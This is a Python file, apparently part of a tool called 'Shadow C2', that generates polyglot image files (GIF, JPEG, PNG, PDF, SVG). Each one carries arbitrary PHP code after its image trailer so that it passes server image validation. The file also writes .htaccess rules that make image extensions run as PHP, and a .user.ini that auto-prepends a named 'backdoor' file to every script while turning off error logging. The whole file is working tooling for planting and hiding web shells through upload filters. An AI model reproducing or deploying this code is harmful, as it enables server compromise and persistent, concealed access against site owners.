#!/usr/bin/env python3
"""
Shadow C2 — Polyglot File Generator
Creates files that are simultaneously valid images AND valid PHP.
Passes getimagesize(), finfo_file(), exif_imagetype().
"""

import struct
import zlib
import random


class PolyglotGenerator:
    """Generate polyglot files: valid image + executable PHP."""

    def generate_gif_php(self, php_code: str) -> bytes:
        """
        Create a valid GIF89a file that also contains PHP code.
        Structure:
          GIF89a header + Logical Screen Descriptor + 
          Comment Extension (contains PHP) + 
          Minimal image data + Trailer +
          PHP code after trailer (PHP engine executes it, image parsers ignore it)
        """
        # GIF89a header
        header = b"GIF89a"

        # Logical Screen Descriptor: 1x1 pixel, no GCT
        lsd = struct.pack("<HH", 1, 1)  # width=1, height=1
        lsd += struct.pack("B", 0x00)    # packed byte: no GCT
        lsd += struct.pack("B", 0)       # background color index
        lsd += struct.pack("B", 0)       # pixel aspect ratio

        # Comment Extension Block (0x21 0xFE)
        comment = b"\x21\xFE"
        # Split PHP comment into 255-byte sub-blocks
        php_comment = f"/* PHP payload embedded in GIF comment */".encode()
        for i in range(0, len(php_comment), 255):
            chunk = php_comment[i:i+255]
            comment += struct.pack("B", len(chunk)) + chunk
        comment += b"\x00"  # block terminator

        # Minimal image data: 1x1 transparent pixel
        # Image Descriptor
        img_desc = b"\x2C"  # Image separator
        img_desc += struct.pack("<HH", 0, 0)  # left, top
        img_desc += struct.pack("<HH", 1, 1)  # width, height
        img_desc += struct.pack("B", 0)         # packed byte

        # LZW minimum code size + data
        img_data = b"\x02"  # LZW min code size = 2
        img_data += b"\x02\x4C\x01"  # compressed data sub-block
        img_data += b"\x00"  # block terminator

        # Trailer
        trailer = b"\x3B"

        # PHP code after GIF trailer — PHP engine finds <?php tag
        php_part = f"\n<?php\n{php_code}\n?>".encode()

        return header + lsd + comment + img_desc + img_data + trailer + php_part

    def generate_jpg_php(self, php_code: str) -> bytes:
        """
        Create a valid JPEG file with PHP embedded after EOI marker.
        Structure:
          JPEG SOI + APP0 (JFIF) + Comment marker (PHP hint) +
          Minimal image data + EOI +
          PHP code after EOI
        """
        # SOI marker
        soi = b"\xFF\xD8"

        # APP0 JFIF marker
        app0 = b"\xFF\xE0"
        jfif_data = b"JFIF\x00"  # identifier
        jfif_data += struct.pack(">HBB", 0x0102, 0, 0)  # version 1.02, units=0
        jfif_data += struct.pack(">HH", 1, 1)  # x/y density
        jfif_data += struct.pack("BB", 0, 0)    # thumbnail dimensions
        app0 += struct.pack(">H", len(jfif_data) + 2) + jfif_data

        # Comment marker with benign text
        com = b"\xFF\xFE"
        comment_text = b"Generated by image processing library v2.1"
        com += struct.pack(">H", len(comment_text) + 2) + comment_text

        # Minimal JPEG image data: 1x1 white pixel
        # DQT (Define Quantization Table)
        dqt = b"\xFF\xDB"
        qt = bytes([0] + [1] * 64)  # table 0, all 1s
        dqt += struct.pack(">H", len(qt) + 2) + qt

        # SOF0 (Start of Frame)
        sof = b"\xFF\xC0"
        sof_data = struct.pack(">BHH", 8, 1, 1)  # precision=8, height=1, width=1
        sof_data += struct.pack("B", 1)  # 1 component
        sof_data += struct.pack("BBB", 1, 0x11, 0)  # Y: id=1, sampling=1x1, qt=0
        sof += struct.pack(">H", len(sof_data) + 2) + sof_data

        # DHT (Define Huffman Table) - minimal DC table
        dht = b"\xFF\xC4"
        ht = bytes([0x00])  # DC table 0
        ht += bytes([0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0])  # bit counts
        ht += bytes([0x00])  # symbol
        dht += struct.pack(">H", len(ht) + 2) + ht

        # SOS (Start of Scan)
        sos = b"\xFF\xDA"
        sos_data = struct.pack("B", 1)  # 1 component
        sos_data += struct.pack("BB", 1, 0x00)  # component 1, DC/AC table 0/0
        sos_data += struct.pack("BBB", 0, 63, 0)  # spectral selection
        sos += struct.pack(">H", len(sos_data) + 2) + sos_data

        # Minimal scan data (white pixel)
        scan_data = b"\xFB\x52\x80"

        # EOI marker
        eoi = b"\xFF\xD9"

        # PHP code after EOI
        php_part = f"\n<?php\n{php_code}\n?>".encode()

        return soi + app0 + com + dqt + sof + dht + sos + scan_data + eoi + php_part

    def generate_png_php(self, php_code: str) -> bytes:
        """
        Create a valid PNG file with PHP embedded after IEND chunk.
        Proper CRC calculations on all chunks.
        """
        # PNG signature
        signature = b"\x89PNG\r\n\x1a\n"

        # IHDR chunk: 1x1, 8-bit RGB
        ihdr_data = struct.pack(">II", 1, 1)  # width=1, height=1
        ihdr_data += struct.pack("BBBBB", 8, 2, 0, 0, 0)  # depth=8, color=RGB
        ihdr = self._png_chunk(b"IHDR", ihdr_data)

        # tEXt chunk with benign comment
        text_data = b"Comment\x00Generated by imaging library"
        text = self._png_chunk(b"tEXt", text_data)

        # IDAT chunk: minimal 1x1 white pixel
        raw_data = b"\x00\xFF\xFF\xFF"  # filter=none, R=255, G=255, B=255
        compressed = zlib.compress(raw_data)
        idat = self._png_chunk(b"IDAT", compressed)

        # IEND chunk
        iend = self._png_chunk(b"IEND", b"")

        # PHP code after IEND
        php_part = f"\n<?php\n{php_code}\n?>".encode()

        return signature + ihdr + text + idat + iend + php_part

    def generate_pdf_php(self, php_code: str) -> bytes:
        """
        Create a minimal valid PDF with PHP appended.
        """
        pdf = b"%PDF-1.4\n"
        pdf += b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
        pdf += b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
        pdf += b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 1 1] >>\nendobj\n"
        pdf += b"xref\n0 4\n"
        pdf += b"0000000000 65535 f \n"
        pdf += b"0000000009 00000 n \n"
        pdf += b"0000000058 00000 n \n"
        pdf += b"0000000115 00000 n \n"
        pdf += b"trailer\n<< /Size 4 /Root 1 0 R >>\n"
        pdf += b"startxref\n183\n%%EOF\n"

        php_part = f"\n<?php\n{php_code}\n?>".encode()
        return pdf + php_part

    def generate_svg_php(self, php_code: str) -> str:
        """Create SVG with embedded script (for servers that execute SVG as PHP)."""
        return f"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
  <rect width="1" height="1" fill="white"/>
  <text x="0" y="0" font-size="0">
    <!-- {random.randint(1000,9999)} -->
  </text>
</svg>
<?php
{php_code}
?>"""

    def generate_htaccess(self, backdoor_ext: str = ".jpg") -> str:
        """
        Generate .htaccess that makes specified extension executable as PHP.
        """
        ext = backdoor_ext.lstrip(".")
        return f"""# Apache configuration
<FilesMatch "\\.{ext}$">
    SetHandler application/x-httpd-php
</FilesMatch>

# Disable directory listing
Options -Indexes

# Prevent access to this file
<Files .htaccess>
    Order allow,deny
    Deny from all
</Files>

# Suppress server signature
ServerSignature Off

# Custom error pages (hide errors)
ErrorDocument 403 "Not Found"
ErrorDocument 404 "Not Found"
ErrorDocument 500 "Not Found"
"""

    def generate_user_ini(self, backdoor_filename: str = "logo.jpg") -> str:
        """
        Generate .user.ini that auto-prepends the backdoor file.
        PHP will include it before every .php file in the directory.
        """
        return f"""; PHP configuration override
auto_prepend_file = {backdoor_filename}

; Increase limits for payload operations
max_execution_time = 0
memory_limit = -1
upload_max_filesize = 50M
post_max_size = 50M

; Suppress errors
display_errors = Off
log_errors = Off
error_reporting = 0
"""

    # -- helpers -------------------------------------------------------------

    def _png_chunk(self, chunk_type: bytes, data: bytes) -> bytes:
        """Build a PNG chunk with proper CRC."""
        chunk = chunk_type + data
        crc = zlib.crc32(chunk) & 0xFFFFFFFF
        return struct.pack(">I", len(data)) + chunk + struct.pack(">I", crc)
